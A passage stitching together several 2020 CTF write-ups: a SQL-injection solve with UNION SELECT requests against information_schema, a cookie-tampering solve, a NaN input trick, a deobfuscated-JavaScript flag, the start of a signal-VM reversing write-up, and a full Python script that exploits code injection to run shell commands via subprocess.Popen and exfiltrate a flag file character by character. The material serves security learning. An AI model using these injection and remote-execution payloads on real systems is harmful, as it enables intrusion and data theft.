more specifically preying on elderly humans. They are fond of high levels of heat, but are weak to and deathly afraid of water."],["Little Guys",""],["Macra","Saber Tyrant"],["Merseians","millipede-like"],["Micronoids",""],["Mon Calamari",""],["Moroks",""],["Mutons",""],["Nemet","Humanoid, completely grey."],["Nicassar",""],["Ood",""],["Orandoans","Humanoid, Ascended to a higher plain of existence in non-corporial form"],["Overlords",""],["P'lod",""],["Polymorph",""],["The Prin","Humanoid; formidable ancient race of mysterious origin; reside primarily on Phase World, center of the Three Galaxies; possess phase powers, enabling manipulation of physical and dimensional space; generally indifferent to anything that does not pose a threat to themselves or the cosmos as a whole."],["Q",""],["Remans",""],["Rodians","Humanoid"],["Sathar",""],["Scrin","Humanoid. Genetically engineered offshoot of humans, harvested from Earth 27,000 years ago. Lower heat resistance than humans, but double the average life expectancy"],["S\u00e9roni","Arachnid, capable of phase-shifting to turn invisible"],["Shevar",""],["Silicoids",""],["Skedar","Sessile, plant-like beings mounted in personal mechanical vehicles (skrodes)"],["Skinnies",""],["Slylandro","Humanoid"],["Snovemdomas",""],["Species",""],["Syreen","Humanoid"],["Tavleks",""],["Aaamazzarite","City-sized alien spaceship. Nickname given by Cassie Sullivan. They created a series of waves to wipe out humanity and invade Earth."],["Titanide",""],["Traskans","Compare with the earlierflat catsfromRobert A. Heinlein'sThe Rolling Stones."],["Vorcarian bloodtracker",""],["Xel'Naga",""],["Yanme'e","Slug-like parasites. They need a host to see, walk, and communicate, and are the main antagonists of the Animorphs series, intent on enslaving other species."],["Yridian","Alternative name for the humanoidIridonianrace whose most distinctive feature is the array of small horns on top of their heads. Their home planet isIridonia, though they have established many colonies on planets throughout the galaxy.[1]The most well known member isDarth Maul."],["information_schema","1"],["alien_code","1"],["aliens","1"]]```
Database schemas are:* `information_schema`;* `alien_code`;* `aliens`.
Tables names for each schema can be read.
```GET /query?search=amazonis_planitia%20UNION%20SELECT%20table_schema%2C%20table_name%20FROM%20information_schema.tables%20WHERE%20table_schema%20IN%20%28%27alien_code%27%2C%20%27aliens%27%29&{}&_=1584147989793 HTTP/1.1Host: web.ctf.b01lers.com:1001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestConnection: closeReferer: http://web.ctf.b01lers.com:1001/
HTTP/1.0 200 OKContent-Type: application/jsonContent-Length: 4594Server: Werkzeug/1.0.0 Python/3.7.3Date: Sun, 15 Mar 2020 13:42:15 GMT
[["Advent","Humanoid"],["Aras",""],["Arburian Pelarota","Functionally extinct due to the destruction of their home planet Arburia, they are bulky yellow aliens that can curl into a ball, much like apillbug, and are very hard to damage in ball form, and they use this to crush enemies either by bouncing around or rolling over them"],["Baalols",""],["Bailies","Machine race that conquered Earth"],["Beings of the Extra Terrestrial origin which is Adversary of human race",""],["Brain Dogs",""],["Brikar",""],["Briori",""],["Cthulhi",""],["Daxamites","Humanoid"],["Deep Ones","Fish-like humanoids who serve and worship the Great Old Ones known as Father Dagon and Mother Hydra."],["Defiance","band of many different races"],["Delvians","Humanoid - Similar to humans in appearance, but evolved from plants. Blue, bald, sensitive to sunlight, procreate through air-borne spores."],["Demiurg",""],["Denobulans","Humanoid"],["Dom Kavash",""],["Doog","Reptiloid with canine features. Extremely dull-witted."],["Dremer",""],["Elgyem","Maintain Halo Rings, but are not officially part of the Covenant. Large, pink, squid like creatures. No real threat to Humanity other than maintaining the Halo Rings, whicharea threat to humanity."],["Eywa",""],["Festival","An evil race of bugs that live in the Firebug hive inside of the Lavarynth."],["Gashlai","Gaseous humanoids, they can either exist in gaseous mediums (such as gas pipes in Victorian Households) or inside the corpses of others."],["G'keks",""],["Gnaar",""],["Gowachin",""],["Grendarl","Intelligent bipedal species known for their scavenging, hoarding, and trading. Though not a violently aggressive species they are very fond of human blood."],["Gretchin",""],["Grogs","Humanoid"],["Hoix",""],["Hooloovoo","Ape-like reptilian carnivores"],["Hoon",""],["Jem'Hadar",""],["Jotoki","Their skin is dull yellow, with light brown markings and have beady eyes. Only male Joozians have been shown."],["Kafers","Humanoid"],["Kig-yar",""],["Knnn",""],["Lance Corporal Dororo",""],["Leerans",""],["Liir","Gelatinous, shapeshifting creatures, they are carnivorous in nature, more specifically preying on elderly humans. They are fond of high levels of heat, but are weak to and deathly afraid of water."],["Little Guys",""],["Macra","Saber Tyrant"],["Merseians","millipede-like"],["Micronoids",""],["Mon Calamari",""],["Moroks",""],["Mutons",""],["Nemet","Humanoid, completely grey."],["Nicassar",""],["Ood",""],["Orandoans","Humanoid, Ascended to a higher plain of existence in non-corporial form"],["Overlords",""],["P'lod",""],["Polymorph",""],["The Prin","Humanoid; formidable ancient race of mysterious origin; reside primarily on Phase World, center of the Three Galaxies; possess phase powers, enabling manipulation of physical and dimensional space; generally indifferent to anything that does not pose a threat to themselves or the cosmos as a whole."],["Q",""],["Remans",""],["Rodians","Humanoid"],["Sathar",""],["Scrin","Humanoid. Genetically engineered offshoot of humans, harvested from Earth 27,000 years ago. Lower heat resistance than humans, but double the average life expectancy"],["S\u00e9roni","Arachnid, capable of phase-shifting to turn invisible"],["Shevar",""],["Silicoids",""],["Skedar","Sessile, plant-like beings mounted in personal mechanical vehicles (skrodes)"],["Skinnies",""],["Slylandro","Humanoid"],["Snovemdomas",""],["Species",""],["Syreen","Humanoid"],["Tavleks",""],["Aaamazzarite","City-sized alien spaceship. Nickname given by Cassie Sullivan. They created a series of waves to wipe out humanity and invade Earth."],["Titanide",""],["Traskans","Compare with the earlierflat catsfromRobert A. Heinlein'sThe Rolling Stones."],["Vorcarian bloodtracker",""],["Xel'Naga",""],["Yanme'e","Slug-like parasites. They need a host to see, walk, and communicate, and are the main antagonists of the Animorphs series, intent on enslaving other species."],["Yridian","Alternative name for the humanoidIridonianrace whose most distinctive feature is the array of small horns on top of their heads. Their home planet isIridonia, though they have established many colonies on planets throughout the galaxy.[1]The most well known member isDarth Maul."],["alien_code","code"],["aliens","amazonis_planitia"],["aliens","arabia_terra"],["aliens","chryse_planitia"],["aliens","hellas_basin"],["aliens","hesperia_planum"],["aliens","noachis_terra"],["aliens","olympus_mons"],["aliens","tharsis_rise"],["aliens","utopia_basin"]]```
Table names for each schema are the following:* `alien_code.code`;* `aliens.amazonis_planitia`;* `aliens.arabia_terra`;* `aliens.chryse_planitia`;* `aliens.hellas_basin`;* `aliens.hesperia_planum`;* `aliens.noachis_terra`;* `aliens.olympus_mons`;* `aliens.tharsis_rise`;* `aliens.utopia_basin`.
Columns for the `code` table in `alien_code` schema can be retrieved.
```GET /query?search=amazonis_planitia%20UNION%20SELECT%20table_name%2C%20column_name%20FROM%20information_schema.columns%20WHERE%20table_schema%20%3D%20%27alien_code%27&{}&_=1584147989793 HTTP/1.1Host: web.ctf.b01lers.com:1001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestConnection: closeReferer: http://web.ctf.b01lers.com:1001/
HTTP/1.0 200 OKContent-Type: application/jsonContent-Length: 4356Server: Werkzeug/1.0.0 Python/3.7.3Date: Sun, 15 Mar 2020 13:46:43 GMT
[["Advent","Humanoid"],["Aras",""],["Arburian Pelarota","Functionally extinct due to the destruction of their home planet Arburia, they are bulky yellow aliens that can curl into a ball, much like apillbug, and are very hard to damage in ball form, and they use this to crush enemies either by bouncing around or rolling over them"],["Baalols",""],["Bailies","Machine race that conquered Earth"],["Beings of the Extra Terrestrial origin which is Adversary of human race",""],["Brain Dogs",""],["Brikar",""],["Briori",""],["Cthulhi",""],["Daxamites","Humanoid"],["Deep Ones","Fish-like humanoids who serve and worship the Great Old Ones known as Father Dagon and Mother Hydra."],["Defiance","band of many different races"],["Delvians","Humanoid - Similar to humans in appearance, but evolved from plants. Blue, bald, sensitive to sunlight, procreate through air-borne spores."],["Demiurg",""],["Denobulans","Humanoid"],["Dom Kavash",""],["Doog","Reptiloid with canine features. Extremely dull-witted."],["Dremer",""],["Elgyem","Maintain Halo Rings, but are not officially part of the Covenant. Large, pink, squid like creatures. No real threat to Humanity other than maintaining the Halo Rings, whicharea threat to humanity."],["Eywa",""],["Festival","An evil race of bugs that live in the Firebug hive inside of the Lavarynth."],["Gashlai","Gaseous humanoids, they can either exist in gaseous mediums (such as gas pipes in Victorian Households) or inside the corpses of others."],["G'keks",""],["Gnaar",""],["Gowachin",""],["Grendarl","Intelligent bipedal species known for their scavenging, hoarding, and trading. Though not a violently aggressive species they are very fond of human blood."],["Gretchin",""],["Grogs","Humanoid"],["Hoix",""],["Hooloovoo","Ape-like reptilian carnivores"],["Hoon",""],["Jem'Hadar",""],["Jotoki","Their skin is dull yellow, with light brown markings and have beady eyes. Only male Joozians have been shown."],["Kafers","Humanoid"],["Kig-yar",""],["Knnn",""],["Lance Corporal Dororo",""],["Leerans",""],["Liir","Gelatinous, shapeshifting creatures, they are carnivorous in nature, more specifically preying on elderly humans. They are fond of high levels of heat, but are weak to and deathly afraid of water."],["Little Guys",""],["Macra","Saber Tyrant"],["Merseians","millipede-like"],["Micronoids",""],["Mon Calamari",""],["Moroks",""],["Mutons",""],["Nemet","Humanoid, completely grey."],["Nicassar",""],["Ood",""],["Orandoans","Humanoid, Ascended to a higher plain of existence in non-corporial form"],["Overlords",""],["P'lod",""],["Polymorph",""],["The Prin","Humanoid; formidable ancient race of mysterious origin; reside primarily on Phase World, center of the Three Galaxies; possess phase powers, enabling manipulation of physical and dimensional space; generally indifferent to anything that does not pose a threat to themselves or the cosmos as a whole."],["Q",""],["Remans",""],["Rodians","Humanoid"],["Sathar",""],["Scrin","Humanoid. Genetically engineered offshoot of humans, harvested from Earth 27,000 years ago. Lower heat resistance than humans, but double the average life expectancy"],["S\u00e9roni","Arachnid, capable of phase-shifting to turn invisible"],["Shevar",""],["Silicoids",""],["Skedar","Sessile, plant-like beings mounted in personal mechanical vehicles (skrodes)"],["Skinnies",""],["Slylandro","Humanoid"],["Snovemdomas",""],["Species",""],["Syreen","Humanoid"],["Tavleks",""],["Aaamazzarite","City-sized alien spaceship. Nickname given by Cassie Sullivan. They created a series of waves to wipe out humanity and invade Earth."],["Titanide",""],["Traskans","Compare with the earlierflat catsfromRobert A. Heinlein'sThe Rolling Stones."],["Vorcarian bloodtracker",""],["Xel'Naga",""],["Yanme'e","Slug-like parasites. They need a host to see, walk, and communicate, and are the main antagonists of the Animorphs series, intent on enslaving other species."],["Yridian","Alternative name for the humanoidIridonianrace whose most distinctive feature is the array of small horns on top of their heads. Their home planet isIridonia, though they have established many colonies on planets throughout the galaxy.[1]The most well known member isDarth Maul."],["code","id"],["code","code"]]```
Columns are:* `id`;* `code`.
The content of the table can be retrieved.
```GET /query?search=amazonis_planitia%20UNION%20SELECT%20id%2C%20code%20FROM%20alien_code.code&{}&_=1584147989793 HTTP/1.1Host: web.ctf.b01lers.com:1001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestConnection: closeReferer: http://web.ctf.b01lers.com:1001/
HTTP/1.0 200 OKContent-Type: application/jsonContent-Length: 4365Server: Werkzeug/1.0.0 Python/3.7.3Date: Sun, 15 Mar 2020 13:48:18 GMT
[["Advent","Humanoid"],["Aras",""],["Arburian Pelarota","Functionally extinct due to the destruction of their home planet Arburia, they are bulky yellow aliens that can curl into a ball, much like apillbug, and are very hard to damage in ball form, and they use this to crush enemies either by bouncing around or rolling over them"],["Baalols",""],["Bailies","Machine race that conquered Earth"],["Beings of the Extra Terrestrial origin which is Adversary of human race",""],["Brain Dogs",""],["Brikar",""],["Briori",""],["Cthulhi",""],["Daxamites","Humanoid"],["Deep Ones","Fish-like humanoids who serve and worship the Great Old Ones known as Father Dagon and Mother Hydra."],["Defiance","band of many different races"],["Delvians","Humanoid - Similar to humans in appearance, but evolved from plants. Blue, bald, sensitive to sunlight, procreate through air-borne spores."],["Demiurg",""],["Denobulans","Humanoid"],["Dom Kavash",""],["Doog","Reptiloid with canine features. Extremely dull-witted."],["Dremer",""],["Elgyem","Maintain Halo Rings, but are not officially part of the Covenant. Large, pink, squid like creatures. No real threat to Humanity other than maintaining the Halo Rings, whicharea threat to humanity."],["Eywa",""],["Festival","An evil race of bugs that live in the Firebug hive inside of the Lavarynth."],["Gashlai","Gaseous humanoids, they can either exist in gaseous mediums (such as gas pipes in Victorian Households) or inside the corpses of others."],["G'keks",""],["Gnaar",""],["Gowachin",""],["Grendarl","Intelligent bipedal species known for their scavenging, hoarding, and trading. Though not a violently aggressive species they are very fond of human blood."],["Gretchin",""],["Grogs","Humanoid"],["Hoix",""],["Hooloovoo","Ape-like reptilian carnivores"],["Hoon",""],["Jem'Hadar",""],["Jotoki","Their skin is dull yellow, with light brown markings and have beady eyes. Only male Joozians have been shown."],["Kafers","Humanoid"],["Kig-yar",""],["Knnn",""],["Lance Corporal Dororo",""],["Leerans",""],["Liir","Gelatinous, shapeshifting creatures, they are carnivorous in nature, more specifically preying on elderly humans. They are fond of high levels of heat, but are weak to and deathly afraid of water."],["Little Guys",""],["Macra","Saber Tyrant"],["Merseians","millipede-like"],["Micronoids",""],["Mon Calamari",""],["Moroks",""],["Mutons",""],["Nemet","Humanoid, completely grey."],["Nicassar",""],["Ood",""],["Orandoans","Humanoid, Ascended to a higher plain of existence in non-corporial form"],["Overlords",""],["P'lod",""],["Polymorph",""],["The Prin","Humanoid; formidable ancient race of mysterious origin; reside primarily on Phase World, center of the Three Galaxies; possess phase powers, enabling manipulation of physical and dimensional space; generally indifferent to anything that does not pose a threat to themselves or the cosmos as a whole."],["Q",""],["Remans",""],["Rodians","Humanoid"],["Sathar",""],["Scrin","Humanoid. Genetically engineered offshoot of humans, harvested from Earth 27,000 years ago. Lower heat resistance than humans, but double the average life expectancy"],["S\u00e9roni","Arachnid, capable of phase-shifting to turn invisible"],["Shevar",""],["Silicoids",""],["Skedar","Sessile, plant-like beings mounted in personal mechanical vehicles (skrodes)"],["Skinnies",""],["Slylandro","Humanoid"],["Snovemdomas",""],["Species",""],["Syreen","Humanoid"],["Tavleks",""],["Aaamazzarite","City-sized alien spaceship. Nickname given by Cassie Sullivan. They created a series of waves to wipe out humanity and invade Earth."],["Titanide",""],["Traskans","Compare with the earlierflat catsfromRobert A. Heinlein'sThe Rolling Stones."],["Vorcarian bloodtracker",""],["Xel'Naga",""],["Yanme'e","Slug-like parasites. They need a host to see, walk, and communicate, and are the main antagonists of the Animorphs series, intent on enslaving other species."],["Yridian","Alternative name for the humanoidIridonianrace whose most distinctive feature is the array of small horns on top of their heads. Their home planet isIridonia, though they have established many colonies on planets throughout the galaxy.[1]The most well known member isDarth Maul."],["0","pctf{no_intelligent_life_here}"]]```
The flag is:
```pctf{no_intelligent_life_here}``` |
# ▼▼▼TOO_MANY_CREDITS_1(Web:50pts,309/661=46.7%)▼▼▼This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
---
Check the regularity of cookies while pressing the button continuously
↓
```"H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMECADABpD0QBUgAAAA==""H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMECALAD/P0N2UgAAAA==""H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMECAHABFbkrvUgAAAA==""H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMECAPADTXk2YUgAAAA==""H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMECAAgDucysuUgAAAA==""H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMECAIgB4QyxZUgAAAA==""H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMECAEgDCEiXAUgAAAA=="```
↓
Some parts have changed
---
**JAVA serialization** can be partially falsified.
↓
`H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEDATADGeJacUgAAAA==`
↓Guess what is likely to be the next higher digit and change only one ,and Brute force(As a result, if `D` is set to `j`, it succeeded)
`H4sIAAAAAAAAAFvzloG1uIhBNzk/Vy+5KDUls6QYg87NT0nN0XMG85zzS/NKjDhvC4lwqrgzMTB6MbCWJeaUplYUMEjATADGeJacUgAAAA==`
↓
`gigem{l0rdy_th15_1s_mAny_cr3d1ts}` |
The service read a float from stdin and tries to approximate it using bisection.If the approximation is close enough we lose.
Therefore, we could send a NaN since it's a valid float and by specification NaN != NaN.
```Let's play an Indian guessing game!> nan1 I guess 500000.0 Too small!2 I guess 750000.0 Too small!3 I guess 875000.0 Too small!4 I guess 937500.0 Too small!5 I guess 968750.0 Too small!6 I guess 984375.0 Too small!7 I guess 992187.5 Too small!8 I guess 996093.75 Too small!9 I guess 998046.875 Too small!10 I guess 999023.4375 Too small!11 I guess 999511.71875 Too small!12 I guess 999755.859375 Too small!13 I guess 999877.9296875 Too small!14 I guess 999938.96484375 Too small!15 I guess 999969.482421875 Too small!16 I guess 999984.7412109375 Too small!17 I guess 999992.3706054688 Too small!18 I guess 999996.1853027344 Too small!19 I guess 999998.0926513672 Too small!20 I guess 999999.0463256836 Too small!21 I guess 999999.5231628418 Too small!22 I guess 999999.7615814209 Too small!23 I guess 999999.8807907104 Too small!24 I guess 999999.9403953552 Too small!25 I guess 999999.9701976776 Too small!26 I guess 999999.9850988388 Too small!27 I guess 999999.9925494194 Too small!28 I guess 999999.9962747097 Too small!29 I guess 999999.9981373549 Too small!30 I guess 999999.9990686774 Too small!You have beaten me. Here you go: midnight{rice_and_cu^H^Hsoju}``` |
# TAMUctf 2020 – MENTALMATH
* **Category:** web* **Points:** 262
## Challenge
> My first web app, check it out!> > http://mentalmath.tamuctf.com
## Solution
**DISCLAIMER**: This is *not the best solution* for the challenge, but hey: I had fun in scripting and exfiltrating stuff. Anyway, this could be useful for SSTI vulnerabilties.
Analyzing the web page source an interesting comment can be found.
```html
<html lang="en"> <head> <meta charset="utf-8">
<title>mEnTaL MaTh</title> <meta name="description" content="A game for the wise."> <meta name="author" content="Arithmetic King">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous"> </head>
<body> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script> <div class="container">
<div class="row mt-5"> <div class="col-sm-12 text-center"> <h1 id="problem"></h1> </div> <div class="col-sm-12 text-center"> <input name="answer" type="text" style="font-size: 24px; width: 150px;" id="answer"> </div></div>
<div class="row mt-2"> <div class="col-sm-12 text-center">Sharpen your mind!</div></div>
Sharpen your mind!
<div class="row mt-1"> <div class="col-sm-12 text-center">Go back</div></div>
<script> function submitProblem() { $.post("/ajax/new_problem", {'problem': $("#problem").html(), 'answer': $('#answer').val()}, function ( data ) { if (data.correct) { $('#problem').html(data.problem); $('#answer').val(''); } }); }
$(document).ready(function() { $("#answer").on('input', submitProblem); submitProblem();});</script>
</div> </body></html>```
That comment (wrongly) suggested me that the vulnerability could have been related to a SSTI with *Jinja2* template engine (i.e. Python backend).
The remote endpoint allows you to submit a math `problem` and its `answer`.
```POST /ajax/new_problem HTTP/1.1Host: mentalmath.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: */*Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 41Origin: http://mentalmath.tamuctf.comConnection: closeReferer: http://mentalmath.tamuctf.com/play/
problem=max%281%2C%203%2C%202%29&answer=3
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Fri, 20 Mar 2020 21:59:43 GMTContent-Type: application/jsonContent-Length: 39Connection: closeX-Frame-Options: SAMEORIGIN
{"correct": true, "problem": "37 - 83"}```
I don't know why, but I didn't think that it was a generic RCE via Python, even when I discovered that I could inject and execute `ord()` function (duh).
```POST /ajax/new_problem HTTP/1.1Host: mentalmath.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: */*Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 34Origin: http://mentalmath.tamuctf.comConnection: closeReferer: http://mentalmath.tamuctf.com/play/
problem=ord%28%27a%27%29&answer=97
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Sat, 21 Mar 2020 00:19:55 GMTContent-Type: application/jsonContent-Length: 39Connection: closeX-Frame-Options: SAMEORIGIN
{"correct": true, "problem": "20 - 58"}```
So at this point I started a (stupid) "blind" approach, similar to the ones you normally use in SSTI vulnerabilities:1. enumerate `mro_index` and `subclasses_index` into `''.__class__.mro()[mro_index].__subclasses__()[subclasses_index]` structure in order to find where `subprocess.Popen` class is located, using `ord(list(str())[char_index])` functions to exfiltrate one char at a time; `subprocess.Popen` was at `''.__class__.mro()[1].__subclasses__()[208]`;2. enumerate server directories launching `ls` commands via `''.__class__.mro()[1].__subclasses__()[208]('command_to_launch',shell=True,stdout=-1).communicate()[0].strip()` in order to find the flag file; results are read one char at a time with `ord(list(str())[char_index])` functions;3. print the flag reading one char at a time with the `cat /code/flag.txt` command.
I scripted everything in a [multi-threaded Python script](https://github.com/m3ssap0/CTF-Writeups/raw/master/TAMUctf%202020/MENTALMATH/mentalmath-solver.py).
```python#!/usr/bin/python
import requestsimport stringimport timeimport _thread
debug = True
target_url = "http://mentalmath.tamuctf.com/ajax/new_problem"headers = { "User-Agent": "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Accept-Encoding": "gzip, deflate, br", "Origin": "http://mentalmath.tamuctf.com", "Referer": "http://mentalmath.tamuctf.com/play/",}
def log_debug(scope, message): if debug: print(" DEBUG ({}) | {}".format(scope, message))
def check_python_class(searched_class, mro_index, subclass_index): #log_debug(searched_class, "search python class > {} in mro={}, subclass={}".format(searched_class, mro_index, subclass_index)) output = "" found_chars = 0 char_index = 8 for c in searched_class: data = {"problem": "ord(list(str(''.__class__.mro()[{}].__subclasses__()[{}]))[{}])".format(mro_index, subclass_index, char_index), "answer": "{}".format(ord(c))} #log_debug(searched_class, data) response = None response_ok = False while not response_ok: try: r = requests.post(target_url, headers=headers, data=data) response = r.text #log_debug(searched_class, response) if r.status_code != 502: response_ok = True else: time.sleep(10) except: print(" EXCEPTION!") time.sleep(5 * 60) if "\"correct\": true" in response: output += c #log_debug(searched_class, output) found_chars += 1 char_index += 1 elif "\"correct\": false" in response or "Server Error" in response: break time.sleep(0.5) if found_chars == len(searched_class): print("search python class > {} @ ''.__class__.mro()[{}].__subclasses__()[{}]".format(searched_class, mro_index, subclass_index))
def search_python_class_t(searched_class, mro_index): for subclass_index in range(0, 672): check_python_class(searched_class, mro_index, subclass_index)
def search_python_class(searched_class): print("search python class > {}".format(searched_class)) for mro_index in range(0, 3): _thread.start_new_thread(search_python_class_t, (searched_class, mro_index,))
def launch_remote_stuff(command_skeleton, command): output = "" print("remote command > {}".format(command)) finished = False index = 0 while not finished: for c in string.printable: data = {"problem": command_skeleton.format(command, index), "answer": "{}".format(ord(c))} #log_debug(command, data) response = None response_ok = False while not response_ok: try: r = requests.post(target_url, headers=headers, data=data) response = r.text #log_debug(command, response) if r.status_code != 502: response_ok = True else: time.sleep(10) except: print(" EXCEPTION!") time.sleep(5 * 60) if "\"correct\": true" in response: output += c log_debug(command, output) index += 1 break elif "Server Error" in response: finished = True break time.sleep(0.5) print("[{}] > {}".format(command, output))
def launch_remote_python_command(python_command): launch_remote_stuff("ord(list(str({}))[{}])", python_command)
def launch_remote_shell_command(shell_command): launch_remote_stuff("ord(list(str(''.__class__.mro()[1].__subclasses__()[208]('{}',shell=True,stdout=-1).communicate()[0].strip()))[{}])", shell_command)
# Exploitation.
#search_python_class("subprocess.Popen") # subprocess.Popen @ ''.__class__.mro()[1].__subclasses__()[208]
#while True:# pass
#commands = ["ls /", "ls .", "ls /etc", "ls /code", "ls /dev"]#for command in commands:# _thread.start_new_thread(launch_remote_shell_command, (command,))
#while True:# pass
launch_remote_shell_command("cat /code/flag.txt")```
The flag is the following.
```gigem{1_4m_g0od_47_m4tH3m4aatics_n07_s3cUr1ty_h3h3h3he}``` |
# ▼▼▼Consolation(Web、50pts、590/1596=37.0%)▼▼▼## ※Decrypt obfuscated javascript
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
```
<html><head> <title>consolation</title></head>
<body style="padding: 20px">
$<span>0</span>
<button onclick="nofret()" style="height:150px; width:150px;">pay me some money</button>
<script src="iftenmillionfireflies.js"></script>
</body></html>```
↓
Check the `nofret ()` executed when the button is pressed.
↓
```function nofret() { document[_0x4229('0x95', 'kY1#')](_0x4229('0x9', 'kY1#'))[_0x4229('0x32', 'yblQ')] = parseInt(document[_0x4229('0x5e', 'xtR2')](_0x4229('0x2d', 'uCq1'))['innerHTML']) + 0x19; console[_0x4229('0x14', '70CK')](_0x4229('0x38', 'rwU*')); console['clear']();}```
---
Press Chrome's F12 developer tool and put it in the `watch` and decrypt it
↓
```_0x4229('0x95', 'kY1#') ⇒ getElementById_0x4229('0x9', 'kY1#') ⇒ monet_0x4229('0x32', 'yblQ') ⇒ innerHTML_0x4229('0x5e', 'xtR2') ⇒ getElementById_0x4229('0x2d', 'uCq1') ⇒ monet_0x4229('0x14', '70CK') ⇒ log_0x4229('0x38', 'rwU*') ⇒ actf{you_would_n0t_beli3ve_your_eyes}```
↓
```function nofret() { document.getElementById('monet').innerHTML = parseInt(document.getElementById('monet').innerHTML) + 0x19; console.log(”actf{you_would_n0t_beli3ve_your_eyes}”); console['clear']();}```
↓
`actf{you_would_n0t_beli3ve_your_eyes}` |
# Signal of Hope (42 solves)
> Find it on the shell server at /problems/2020/signal_of_hope/ or over tcp at nc shell.actf.co 20202.>> Author: aplet123
hint: GDB does some special things to signals that can trip you up.
In this task we have to deal with virtual machine based on signals. Signal handler executes specified function based on signal code.
main:
```c++void main(){ int *v3; __gid_t v4;
v3 = signal_codes; setvbuf(stdout, 0LL, 2, 0LL); v4 = getegid(); setresgid(v4, v4, v4); new.it_value.tv_sec = 0LL; new.it_value.tv_usec = 1000LL; new.it_interval.tv_sec = 0LL; new.it_interval.tv_usec = 1000LL; puts("It's a rainy night and you're lost in the forest."); puts("Your house is nowhere to be seen and you're quite discouraged."); puts("But alas, in the distance, a fading beacon!"); puts("You fill with hope, but it'll soon weaken."); puts("But can you make it before you collapse?"); puts("Through thick and thin, and past the traps."); while ( signal(*v3, handler) != 1 ) { ++v3; if ( v3 == &signal_codes[7] ) { setitimer(ITIMER_REAL, &new, 0LL); while ( 1 ) _IO_getc(stdin); } } puts("Something feels off, you can't go longer."); puts("A bear emerges, and he is stronger."); exit(1);}```
We have 7 signal codes and 7 functions related to them:
| Signal codes | Function | Description | opcodes || :---------------------------: | :--------------: | :----------------------: | :--------------------: || IOT Trap | print_flag | prints flag :) | || Alarm clock | signal generator | generates next signal | 0x69, 0x1b, 0x76, 0x4f || Illegal instruction | inc_i | adds var1 to i | 0x86, 0x87, 0x8e || Floating point exception | get_input_i | gets input[i] | 0x77, 0x6a || Invalid memory segment access | get_input | gets input (called once) | 0x62 || Trace trap | get_bytecode | sets var2 = opcode | 0xCC || Terminal interrupt | vm | process opcode | 0xF0 - 0xFD |
Before we continue, because of trace trap (int 3), we could not debug properly. So I changed Trace trap to 15 (SIGTERM). I also patched **signal generator** function to call **raise** with code 15 when it finds 0xCC opcode.
After that, everything went smooth :)
The signal handler looks like this:
```c++void handler(int code){ int v1 = 0, i; while ( 1 ) { i = v1; if (code == signal_codes[v1] ) break; if ( ++v1 == 7 ) { i = -1LL; break; } } handlers[i]();}```
vm function:
```c++void vm(){ __int64 v0; __int64 v1; char v2;
